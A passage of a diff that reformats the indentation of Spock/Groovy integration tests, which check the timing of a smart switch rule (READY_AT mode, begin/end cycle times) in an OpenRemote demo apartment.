             getClass().getResource("/org/openremote/test/rules/ResidenceSmartSwitch.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
-        }
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
+    }
 
-        and: "smart switches should be off"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    and: "smart switches should be off"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "mode is set to READY_AT"
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "READY_AT")
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "mode is set to READY_AT"
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "READY_AT")
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be READY_AT but actuator not enabled"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be READY_AT but actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "begin/end cycle time is set to future"
-        long threeHoursInFutureMillis = getClockTimeOf(container) + (3 * 60 * 60 * 1000)
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", threeHoursInFutureMillis)
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "begin/end cycle time is set to future"
+    long threeHoursInFutureMillis = getClockTimeOf(container) + (3 * 60 * 60 * 1000)
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", threeHoursInFutureMillis)
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be READY_AT and actuator enabled with correct start/stop time"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
-            assert kitchen.getAttribute("smartSwitchBeginEndA").flatMap{it.value}.orElse(0l) == threeHoursInFutureMillis
-            assert kitchen.getAttribute("smartSwitchStartTimeA").flatMap{it.value}.orElse(0l) == getClockTimeOf(container)
-            assert kitchen.getAttribute("smartSwitchStopTimeA").flatMap{it.value}.orElse(0l) == threeHoursInFutureMillis
-            assert kitchen.getAttribute("smartSwitchEnabledA").flatMap{it.value}.orElse(0l) == 1
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be READY_AT and actuator enabled with correct start/stop time"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
+      assert kitchen.getAttribute("smartSwitchBeginEndA").flatMap{
+        it.value
+      }.orElse(0l) == threeHoursInFutureMillis
+      assert kitchen.getAttribute("smartSwitchStartTimeA").flatMap{
+        it.value
+      }.orElse(0l) == getClockTimeOf(container)
+      assert kitchen.getAttribute("smartSwitchStopTimeA").flatMap{
+        it.value
+      }.orElse(0l) == threeHoursInFutureMillis
+      assert kitchen.getAttribute("smartSwitchEnabledA").flatMap{it.value}.orElse(0l) == 1
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "time advances beyond end of cycle"
-        advancePseudoClock(5, HOURS, container)
+    when: "time advances beyond end of cycle"
+    advancePseudoClock(5, HOURS, container)
 
-        then: "mode should be NOW_ON and actuator not enabled"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "NOW_ON"
-            assert !kitchen.getAttribute("smartSwitchBeginEndA").get().getValue().isPresent()
-            assert kitchen.getAttribute("smartSwitchStartTimeA").flatMap{it.value}.orElse(0l) == 0
-            assert kitchen.getAttribute("smartSwitchStopTimeA").flatMap{it.value}.orElse(0l) == 0
-            assert kitchen.getAttribute("smartSwitchEnabledA").flatMap{it.value}.orElse(0l) == 0
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be NOW_ON and actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "NOW_ON"
+      assert !kitchen.getAttribute("smartSwitchBeginEndA").get().getValue().isPresent()
+      assert kitchen.getAttribute("smartSwitchStartTimeA").flatMap{it.value}.orElse(0l) == 0
+      assert kitchen.getAttribute("smartSwitchStopTimeA").flatMap{it.value}.orElse(0l) == 0
+      assert kitchen.getAttribute("smartSwitchEnabledA").flatMap{it.value}.orElse(0l) == 0
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchBeginEndC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
+  }
 
-            }
+  def "Set mode READY_AT and begin/end cycle time in past"() {
 
-    def "Set mode READY_AT and begin/end cycle time in past"() {
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine apartment1Engine = null
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine apartment1Engine = null
-
-        and: "some rules"
-        Ruleset ruleset = new AssetRuleset(
+    and: "some rules"
+    Ruleset ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Demo Apartment - Smart Start",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/ResidenceSmartSwitch.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
-        }
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
+    }
 
-        and: "smart switches should be off"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    and: "smart switches should be off"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "mode is set to READY_AT"
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "READY_AT")
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "mode is set to READY_AT"
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "READY_AT")
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be READY_AT but actuator not enabled"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be READY_AT but actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "begin/end cycle time is set to past"
-        long fiveMinutesInPastMillis = getClockTimeOf(container) - (5 * 60 * 1000)
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", fiveMinutesInPastMillis)
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "begin/end cycle time is set to past"
+    long fiveMinutesInPastMillis = getClockTimeOf(container) - (5 * 60 * 1000)
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", fiveMinutesInPastMillis)
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be READY_AT but actuator not enabled"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
-            assert kitchen.getAttribute("smartSwitchBeginEndA").flatMap{it.value}.orElse(0l) == fiveMinutesInPastMillis
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be READY_AT but actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
+      assert kitchen.getAttribute("smartSwitchBeginEndA").flatMap{
+        it.value
+      }.orElse(0l) == fiveMinutesInPastMillis
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
+  }
 
-            }
+  def "Set mode READY_AT and insufficient begin/end cycle time"() {
 
-    def "Set mode READY_AT and insufficient begin/end cycle time"() {
+    given: "the container environment is started"
+    def conditions = new PollingConditions(timeout: 10, delay: 0.2)
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def rulesService = container.getService(RulesService.class)
+    def assetStorageService = container.getService(AssetStorageService.class)
+    def assetProcessingService = container.getService(AssetProcessingService.class)
+    def rulesetStorageService = container.getService(RulesetStorageService.class)
+    RulesEngine apartment1Engine = null
 
-        given: "the container environment is started"
-        def conditions = new PollingConditions(timeout: 10, delay: 0.2)
-        def container = startContainer(defaultConfig(), defaultServices())
-        def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        def rulesService = container.getService(RulesService.class)
-        def assetStorageService = container.getService(AssetStorageService.class)
-        def assetProcessingService = container.getService(AssetProcessingService.class)
-        def rulesetStorageService = container.getService(RulesetStorageService.class)
-        RulesEngine apartment1Engine = null
-
-        and: "some rules"
-        Ruleset ruleset = new AssetRuleset(
+    and: "some rules"
+    Ruleset ruleset = new AssetRuleset(
             managerTestSetup.apartment1Id,
             "Demo Apartment - Smart Start",
             Ruleset.Lang.GROOVY,
             getClass().getResource("/org/openremote/test/rules/ResidenceSmartSwitch.groovy").text)
-        rulesetStorageService.merge(ruleset)
+    rulesetStorageService.merge(ruleset)
 
-        expect: "the rule engines to become available and be running"
-        conditions.eventually {
-            apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
-            assert apartment1Engine != null
-            assert apartment1Engine.isRunning()
-            assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
-        }
+    expect: "the rule engines to become available and be running"
+    conditions.eventually {
+      apartment1Engine = rulesService.assetEngines.get(managerTestSetup.apartment1Id)
+      assert apartment1Engine != null
+      assert apartment1Engine.isRunning()
+      assert apartment1Engine.facts.assetStates.size() == DEMO_RULE_STATES_APARTMENT_1
+    }
 
-        and: "smart switches should be off"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    and: "smart switches should be off"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert !kitchen.getAttribute("smartSwitchModeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "mode is set to READY_AT"
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "READY_AT")
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "mode is set to READY_AT"
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchModeA", "READY_AT")
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be READY_AT but actuator not enabled"
-        conditions.eventually {
-            def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
-            assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
-            assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
-            assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
-        }
+    then: "mode should be READY_AT but actuator not enabled"
+    conditions.eventually {
+      def kitchen = assetStorageService.find(managerTestSetup.apartment1KitchenId, true)
+      assert kitchen.getAttribute("smartSwitchModeA").get().getValue().get() == "READY_AT"
+      assert !kitchen.getAttribute("smartSwitchStartTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledA").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledB").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchModeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStartTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchStopTimeC").get().getValue().isPresent()
+      assert !kitchen.getAttribute("smartSwitchEnabledC").get().getValue().isPresent()
+    }
 
-        when: "begin/end cycle time is set insufficient future time"
-        long fiveMinutesInFuture = getClockTimeOf(container) + (5 * 60 * 1000)
-        assetProcessingService.sendAttributeEvent(
-                new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", fiveMinutesInFuture)
-        )
-        noEventProcessedIn(assetProcessingService, 500)
+    when: "begin/end cycle time is set insufficient future time"
+    long fiveMinutesInFuture = getClockTimeOf(container) + (5 * 60 * 1000)
+    assetProcessingService.sendAttributeEvent(
+            new AttributeEvent(managerTestSetup.apartment1KitchenId, "smartSwitchBeginEndA", fiveMinutesInFuture)
+            )
+    noEventProcessedIn(assetProcessingService, 500)
 
-        then: "mode should be READY_AT but actuator not enabled"
-        conditions.eventually {
